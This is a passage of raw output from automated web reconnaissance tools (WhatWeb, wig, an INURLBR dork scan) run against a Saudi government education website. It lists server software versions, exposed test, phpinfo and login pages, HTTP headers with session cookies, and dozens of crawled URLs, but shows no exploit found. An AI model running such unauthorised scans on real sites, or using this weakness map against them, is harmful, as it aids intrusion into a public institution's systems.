  1662. http://www.hbthedu.gov.sa [200 OK] Cookies[PHPSESSID,dim_lastactivity,dim_lastvisit,dim_sessionhash,dim_styleid], Country[NETHERLANDS][NL], Frame, HTML5, HttpOnly[dim_sessionhash,dim_styleid], IP[85.17.16.76], JQuery, MetaGenerator[Dimofinf v4.0.0], PoweredBy[Dimofinf], Script[javascript,text/javascript], Title[تعليم حوطة بني تميم والحريق], UncommonHeaders[access-control-allow-origin,x-nginx-cache-status,x-server-powered-by], X-XSS-Protection[1; mode=block], x-pingback[http://www.hbthedu.gov.sa/xmlrpc.php]
  1663. #######################################################################################################################################
  1664. wig - WebApp Information Gatherer
  1665.  
  1666.  
  1667. Scanning http://www.hbthedu.gov.sa...
  1668. ____________________ SITE INFO ____________________
  1669. IP Title
  1670. 85.17.16.76 تعليم حوطة بني تميم والحريق
  1671.  
  1672. _____________________ VERSION _____________________
  1673. Name Versions Type
  1674. PHP 5.4.45 Platform
  1675. FreeBSD 10 | 11 OS
  1676. OpenBSD 5.9 OS
  1677.  
  1678. ___________________ INTERESTING ___________________
  1679. URL Note Type
  1680. /test.php Test file Interesting
  1681. /test.htm Test file Interesting
  1682. /info.php PHP info file Interesting
  1683. /test/ Test directory Interesting
  1684. /login.php Login Page Interesting
  1685. /login.htm Login Page Interesting
  1686.  
  1687. ___________________________________________________
  1688. Time: 84.4 sec Urls: 655 Fingerprints: 40401
  1689. #######################################################################################################################################
  1690. HTTP/1.1 200 OK
  1691. Date: Mon, 19 Nov 2018 09:06:49 GMT
  1692. Content-Type: text/html
  1693. Vary: Accept-Encoding
  1694. X-Pingback: http://www.hbthedu.gov.sa/xmlrpc.php
  1695. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  1696. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  1697. Pragma: no-cache
  1698. Set-Cookie: PHPSESSID=bocvji018ehb7ur0dbj4r17c60; path=/
  1699. Set-Cookie: dim_styleid=1; expires=Tue, 19-Nov-2019 09:06:48 GMT; path=/; HttpOnly
  1700. Set-Cookie: dim_sessionhash=3b2ce99e2be9ba16af1babf37a5943f5; path=/; HttpOnly
  1701. Set-Cookie: dim_lastvisit=1542618408; expires=Tue, 19-Nov-2019 09:06:48 GMT; path=/
  1702. Set-Cookie: dim_lastactivity=0; expires=Tue, 19-Nov-2019 09:06:48 GMT; path=/
  1703. Access-Control-Allow-Origin: *
  1704. X-XSS-Protection: 1; mode=block
  1705. X-Nginx-Cache-Status: EXPIRED
  1706. X-Server-Powered-By: Dimofinf INC
  1707. Content-Encoding: gzip
  1708. Connection: keep-alive
  1709. #######################################################################################################################################
  1710. ---------------------------------------------------------------------------------------------------------------------------------------
  1711.  
  1712. [ ! ] Starting SCANNER INURLBR 2.1 at [19-11-2018 04:07:27]
  1713. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1714. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1715. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1716.  
  1717. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.hbthedu.gov.sa.txt ]
  1718. [ INFO ][ DORK ]::[ site:www.hbthedu.gov.sa ]
  1719. [ INFO ][ SEARCHING ]:: {
  1720. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.sm ]
  1721.  
  1722. [ INFO ][ SEARCHING ]::
  1723. -[:::]
  1724. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1725.  
  1726. [ INFO ][ SEARCHING ]::
  1727. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1728. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.bn ID: 005911257635119896548:iiolgmwf2se ]
  1729.  
  1730. [ INFO ][ SEARCHING ]::
  1731. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1732.  
  1733. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  1734.  
  1735.  
  1736. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1737. |_[ + ] [ 0 / 100 ]-[04:07:39] [ - ]
  1738. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/ ]
  1739. |_[ + ] Exploit::
  1740. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1741. |_[ + ] More details:: / - / , ISP:
  1742. |_[ + ] Found:: UNIDENTIFIED
  1743.  
  1744. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1745. |_[ + ] [ 1 / 100 ]-[04:07:41] [ - ]
  1746. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/vid/l ]
  1747. |_[ + ] Exploit::
  1748. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1749. |_[ + ] More details:: / - / , ISP:
  1750. |_[ + ] Found:: UNIDENTIFIED
  1751.  
  1752. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1753. |_[ + ] [ 2 / 100 ]-[04:07:44] [ - ]
  1754. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/812 ]
  1755. |_[ + ] Exploit::
  1756. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1757. |_[ + ] More details:: / - / , ISP:
  1758. |_[ + ] Found:: UNIDENTIFIED
  1759.  
  1760. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1761. |_[ + ] [ 3 / 100 ]-[04:07:45] [ - ]
  1762. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9131 ]
  1763. |_[ + ] Exploit::
  1764. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1765. |_[ + ] More details:: / - / , ISP:
  1766. |_[ + ] Found:: UNIDENTIFIED
  1767.  
  1768. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1769. |_[ + ] [ 4 / 100 ]-[04:07:47] [ - ]
  1770. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8889 ]
  1771. |_[ + ] Exploit::
  1772. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1773. |_[ + ] More details:: / - / , ISP:
  1774. |_[ + ] Found:: UNIDENTIFIED
  1775.  
  1776. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1777. |_[ + ] [ 5 / 100 ]-[04:07:49] [ - ]
  1778. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/7562 ]
  1779. |_[ + ] Exploit::
  1780. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1781. |_[ + ] More details:: / - / , ISP:
  1782. |_[ + ] Found:: UNIDENTIFIED
  1783.  
  1784. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1785. |_[ + ] [ 6 / 100 ]-[04:07:50] [ - ]
  1786. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/988 ]
  1787. |_[ + ] Exploit::
  1788. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1789. |_[ + ] More details:: / - / , ISP:
  1790. |_[ + ] Found:: UNIDENTIFIED
  1791.  
  1792. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1793. |_[ + ] [ 7 / 100 ]-[04:07:52] [ - ]
  1794. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8627 ]
  1795. |_[ + ] Exploit::
  1796. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1797. |_[ + ] More details:: / - / , ISP:
  1798. |_[ + ] Found:: UNIDENTIFIED
  1799.  
  1800. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1801. |_[ + ] [ 8 / 100 ]-[04:07:53] [ - ]
  1802. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/967 ]
  1803. |_[ + ] Exploit::
  1804. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1805. |_[ + ] More details:: / - / , ISP:
  1806. |_[ + ] Found:: UNIDENTIFIED
  1807.  
  1808. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1809. |_[ + ] [ 9 / 100 ]-[04:07:55] [ - ]
  1810. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8996 ]
  1811. |_[ + ] Exploit::
  1812. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1813. |_[ + ] More details:: / - / , ISP:
  1814. |_[ + ] Found:: UNIDENTIFIED
  1815.  
  1816. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1817. |_[ + ] [ 10 / 100 ]-[04:07:57] [ - ]
  1818. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2390 ]
  1819. |_[ + ] Exploit::
  1820. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1821. |_[ + ] More details:: / - / , ISP:
  1822. |_[ + ] Found:: UNIDENTIFIED
  1823.  
  1824. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1825. |_[ + ] [ 11 / 100 ]-[04:07:58] [ - ]
  1826. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8544 ]
  1827. |_[ + ] Exploit::
  1828. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1829. |_[ + ] More details:: / - / , ISP:
  1830. |_[ + ] Found:: UNIDENTIFIED
  1831.  
  1832. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1833. |_[ + ] [ 12 / 100 ]-[04:08:00] [ - ]
  1834. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/vb/ ]
  1835. |_[ + ] Exploit::
  1836. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1837. |_[ + ] More details:: / - / , ISP:
  1838. |_[ + ] Found:: UNIDENTIFIED
  1839.  
  1840. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1841. |_[ + ] [ 13 / 100 ]-[04:08:01] [ - ]
  1842. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2240 ]
  1843. |_[ + ] Exploit::
  1844. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1845. |_[ + ] More details:: / - / , ISP:
  1846. |_[ + ] Found:: UNIDENTIFIED
  1847.  
  1848. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1849. |_[ + ] [ 14 / 100 ]-[04:08:03] [ - ]
  1850. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8760 ]
  1851. |_[ + ] Exploit::
  1852. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1853. |_[ + ] More details:: / - / , ISP:
  1854. |_[ + ] Found:: UNIDENTIFIED
  1855.  
  1856. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1857. |_[ + ] [ 15 / 100 ]-[04:08:05] [ - ]
  1858. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8887 ]
  1859. |_[ + ] Exploit::
  1860. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1861. |_[ + ] More details:: / - / , ISP:
  1862. |_[ + ] Found:: UNIDENTIFIED
  1863.  
  1864. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1865. |_[ + ] [ 16 / 100 ]-[04:08:06] [ - ]
  1866. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9127 ]
  1867. |_[ + ] Exploit::
  1868. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1869. |_[ + ] More details:: / - / , ISP:
  1870. |_[ + ] Found:: UNIDENTIFIED
  1871.  
  1872. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1873. |_[ + ] [ 17 / 100 ]-[04:08:08] [ - ]
  1874. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/372 ]
  1875. |_[ + ] Exploit::
  1876. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1877. |_[ + ] More details:: / - / , ISP:
  1878. |_[ + ] Found:: UNIDENTIFIED
  1879.  
  1880. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1881. |_[ + ] [ 18 / 100 ]-[04:08:10] [ - ]
  1882. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/1937 ]
  1883. |_[ + ] Exploit::
  1884. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1885. |_[ + ] More details:: / - / , ISP:
  1886. |_[ + ] Found:: UNIDENTIFIED
  1887.  
  1888. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1889. |_[ + ] [ 19 / 100 ]-[04:08:12] [ - ]
  1890. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8991 ]
  1891. |_[ + ] Exploit::
  1892. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1893. |_[ + ] More details:: / - / , ISP:
  1894. |_[ + ] Found:: UNIDENTIFIED
  1895.  
  1896. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1897. |_[ + ] [ 20 / 100 ]-[04:08:13] [ - ]
  1898. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/1349 ]
  1899. |_[ + ] Exploit::
  1900. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1901. |_[ + ] More details:: / - / , ISP:
  1902. |_[ + ] Found:: UNIDENTIFIED
  1903.  
  1904. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1905. |_[ + ] [ 21 / 100 ]-[04:08:15] [ - ]
  1906. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/258 ]
  1907. |_[ + ] Exploit::
  1908. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1909. |_[ + ] More details:: / - / , ISP:
  1910. |_[ + ] Found:: UNIDENTIFIED
  1911.  
  1912. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1913. |_[ + ] [ 22 / 100 ]-[04:08:17] [ - ]
  1914. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/968 ]
  1915. |_[ + ] Exploit::
  1916. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1917. |_[ + ] More details:: / - / , ISP:
  1918. |_[ + ] Found:: UNIDENTIFIED
  1919.  
  1920. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1921. |_[ + ] [ 23 / 100 ]-[04:08:18] [ - ]
  1922. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8548 ]
  1923. |_[ + ] Exploit::
  1924. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1925. |_[ + ] More details:: / - / , ISP:
  1926. |_[ + ] Found:: UNIDENTIFIED
  1927.  
  1928. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1929. |_[ + ] [ 24 / 100 ]-[04:08:20] [ - ]
  1930. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2215 ]
  1931. |_[ + ] Exploit::
  1932. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1933. |_[ + ] More details:: / - / , ISP:
  1934. |_[ + ] Found:: UNIDENTIFIED
  1935.  
  1936. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1937. |_[ + ] [ 25 / 100 ]-[04:08:21] [ - ]
  1938. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8472 ]
  1939. |_[ + ] Exploit::
  1940. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1941. |_[ + ] More details:: / - / , ISP:
  1942. |_[ + ] Found:: UNIDENTIFIED
  1943.  
  1944. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1945. |_[ + ] [ 26 / 100 ]-[04:08:23] [ - ]
  1946. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8697 ]
  1947. |_[ + ] Exploit::
  1948. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1949. |_[ + ] More details:: / - / , ISP:
  1950. |_[ + ] Found:: UNIDENTIFIED
  1951.  
  1952. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1953. |_[ + ] [ 27 / 100 ]-[04:08:28] [ - ]
  1954. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/1004 ]
  1955. |_[ + ] Exploit::
  1956. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1957. |_[ + ] More details:: / - / , ISP:
  1958. |_[ + ] Found:: UNIDENTIFIED
  1959.  
  1960. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1961. |_[ + ] [ 28 / 100 ]-[04:08:30] [ - ]
  1962. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8478 ]
  1963. |_[ + ] Exploit::
  1964. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1965. |_[ + ] More details:: / - / , ISP:
  1966. |_[ + ] Found:: UNIDENTIFIED
  1967.  
  1968. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1969. |_[ + ] [ 29 / 100 ]-[04:08:31] [ - ]
  1970. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2944 ]
  1971. |_[ + ] Exploit::
  1972. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1973. |_[ + ] More details:: / - / , ISP:
  1974. |_[ + ] Found:: UNIDENTIFIED
  1975.  
  1976. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1977. |_[ + ] [ 30 / 100 ]-[04:08:33] [ - ]
  1978. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8643 ]
  1979. |_[ + ] Exploit::
  1980. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1981. |_[ + ] More details:: / - / , ISP:
  1982. |_[ + ] Found:: UNIDENTIFIED
  1983.  
  1984. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1985. |_[ + ] [ 31 / 100 ]-[04:08:34] [ - ]
  1986. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8458 ]
  1987. |_[ + ] Exploit::
  1988. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1989. |_[ + ] More details:: / - / , ISP:
  1990. |_[ + ] Found:: UNIDENTIFIED
  1991.  
  1992. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1993. |_[ + ] [ 32 / 100 ]-[04:08:36] [ - ]
  1994. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9179 ]
  1995. |_[ + ] Exploit::
  1996. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  1997. |_[ + ] More details:: / - / , ISP:
  1998. |_[ + ] Found:: UNIDENTIFIED
  1999.  
  2000. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2001. |_[ + ] [ 33 / 100 ]-[04:08:38] [ - ]
  2002. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8899 ]
  2003. |_[ + ] Exploit::
  2004. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2005. |_[ + ] More details:: / - / , ISP:
  2006. |_[ + ] Found:: UNIDENTIFIED
  2007.  
  2008. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2009. |_[ + ] [ 34 / 100 ]-[04:08:40] [ - ]
  2010. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8495 ]
  2011. |_[ + ] Exploit::
  2012. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2013. |_[ + ] More details:: / - / , ISP:
  2014. |_[ + ] Found:: UNIDENTIFIED
  2015.  
  2016. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2017. |_[ + ] [ 35 / 100 ]-[04:08:43] [ - ]
  2018. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/mailbox ]
  2019. |_[ + ] Exploit::
  2020. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2021. |_[ + ] More details:: / - / , ISP:
  2022. |_[ + ] Found:: UNIDENTIFIED
  2023.  
  2024. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2025. |_[ + ] [ 36 / 100 ]-[04:08:46] [ - ]
  2026. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9206 ]
  2027. |_[ + ] Exploit::
  2028. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2029. |_[ + ] More details:: / - / , ISP:
  2030. |_[ + ] Found:: UNIDENTIFIED
  2031.  
  2032. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2033. |_[ + ] [ 37 / 100 ]-[04:08:49] [ - ]
  2034. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8715 ]
  2035. |_[ + ] Exploit::
  2036. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2037. |_[ + ] More details:: / - / , ISP:
  2038. |_[ + ] Found:: UNIDENTIFIED
  2039.  
  2040. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2041. |_[ + ] [ 38 / 100 ]-[04:08:51] [ - ]
  2042. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8826 ]
  2043. |_[ + ] Exploit::
  2044. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2045. |_[ + ] More details:: / - / , ISP:
  2046. |_[ + ] Found:: UNIDENTIFIED
  2047.  
  2048. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2049. |_[ + ] [ 39 / 100 ]-[04:08:52] [ - ]
  2050. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8599 ]
  2051. |_[ + ] Exploit::
  2052. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2053. |_[ + ] More details:: / - / , ISP:
  2054. |_[ + ] Found:: UNIDENTIFIED
  2055.  
  2056. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2057. |_[ + ] [ 40 / 100 ]-[04:08:54] [ - ]
  2058. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8453 ]
  2059. |_[ + ] Exploit::
  2060. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2061. |_[ + ] More details:: / - / , ISP:
  2062. |_[ + ] Found:: UNIDENTIFIED
  2063.  
  2064. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2065. |_[ + ] [ 41 / 100 ]-[04:08:58] [ - ]
  2066. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8487 ]
  2067. |_[ + ] Exploit::
  2068. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2069. |_[ + ] More details:: / - / , ISP:
  2070. |_[ + ] Found:: UNIDENTIFIED
  2071.  
  2072. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2073. |_[ + ] [ 42 / 100 ]-[04:09:00] [ - ]
  2074. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/682 ]
  2075. |_[ + ] Exploit::
  2076. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2077. |_[ + ] More details:: / - / , ISP:
  2078. |_[ + ] Found:: UNIDENTIFIED
  2079.  
  2080. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2081. |_[ + ] [ 43 / 100 ]-[04:09:03] [ - ]
  2082. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8719 ]
  2083. |_[ + ] Exploit::
  2084. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2085. |_[ + ] More details:: / - / , ISP:
  2086. |_[ + ] Found:: UNIDENTIFIED
  2087.  
  2088. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2089. |_[ + ] [ 44 / 100 ]-[04:09:04] [ - ]
  2090. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2609 ]
  2091. |_[ + ] Exploit::
  2092. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2093. |_[ + ] More details:: / - / , ISP:
  2094. |_[ + ] Found:: UNIDENTIFIED
  2095.  
  2096. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2097. |_[ + ] [ 45 / 100 ]-[04:09:06] [ - ]
  2098. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/952 ]
  2099. |_[ + ] Exploit::
  2100. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2101. |_[ + ] More details:: / - / , ISP:
  2102. |_[ + ] Found:: UNIDENTIFIED
  2103.  
  2104. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2105. |_[ + ] [ 46 / 100 ]-[04:09:07] [ - ]
  2106. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9033 ]
  2107. |_[ + ] Exploit::
  2108. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2109. |_[ + ] More details:: / - / , ISP:
  2110. |_[ + ] Found:: UNIDENTIFIED
  2111.  
  2112. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2113. |_[ + ] [ 47 / 100 ]-[04:09:09] [ - ]
  2114. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/1005 ]
  2115. |_[ + ] Exploit::
  2116. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2117. |_[ + ] More details:: / - / , ISP:
  2118. |_[ + ] Found:: UNIDENTIFIED
  2119.  
  2120. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2121. |_[ + ] [ 48 / 100 ]-[04:09:10] [ - ]
  2122. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/944 ]
  2123. |_[ + ] Exploit::
  2124. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2125. |_[ + ] More details:: / - / , ISP:
  2126. |_[ + ] Found:: UNIDENTIFIED
  2127.  
  2128. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2129. |_[ + ] [ 49 / 100 ]-[04:09:12] [ - ]
  2130. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2120 ]
  2131. |_[ + ] Exploit::
  2132. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2133. |_[ + ] More details:: / - / , ISP:
  2134. |_[ + ] Found:: UNIDENTIFIED
  2135.  
  2136. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2137. |_[ + ] [ 50 / 100 ]-[04:09:13] [ - ]
  2138. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/819 ]
  2139. |_[ + ] Exploit::
  2140. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2141. |_[ + ] More details:: / - / , ISP:
  2142. |_[ + ] Found:: UNIDENTIFIED
  2143.  
  2144. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2145. |_[ + ] [ 51 / 100 ]-[04:09:14] [ - ]
  2146. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9195 ]
  2147. |_[ + ] Exploit::
  2148. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2149. |_[ + ] More details:: / - / , ISP:
  2150. |_[ + ] Found:: UNIDENTIFIED
  2151.  
  2152. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2153. |_[ + ] [ 52 / 100 ]-[04:09:16] [ - ]
  2154. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/824 ]
  2155. |_[ + ] Exploit::
  2156. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2157. |_[ + ] More details:: / - / , ISP:
  2158. |_[ + ] Found:: UNIDENTIFIED
  2159.  
  2160. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2161. |_[ + ] [ 53 / 100 ]-[04:09:18] [ - ]
  2162. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/375 ]
  2163. |_[ + ] Exploit::
  2164. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2165. |_[ + ] More details:: / - / , ISP:
  2166. |_[ + ] Found:: UNIDENTIFIED
  2167.  
  2168. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2169. |_[ + ] [ 54 / 100 ]-[04:09:19] [ - ]
  2170. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9053 ]
  2171. |_[ + ] Exploit::
  2172. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2173. |_[ + ] More details:: / - / , ISP:
  2174. |_[ + ] Found:: UNIDENTIFIED
  2175.  
  2176. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2177. |_[ + ] [ 55 / 100 ]-[04:09:21] [ - ]
  2178. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9139 ]
  2179. |_[ + ] Exploit::
  2180. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2181. |_[ + ] More details:: / - / , ISP:
  2182. |_[ + ] Found:: UNIDENTIFIED
  2183.  
  2184. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2185. |_[ + ] [ 56 / 100 ]-[04:09:23] [ - ]
  2186. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/553 ]
  2187. |_[ + ] Exploit::
  2188. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2189. |_[ + ] More details:: / - / , ISP:
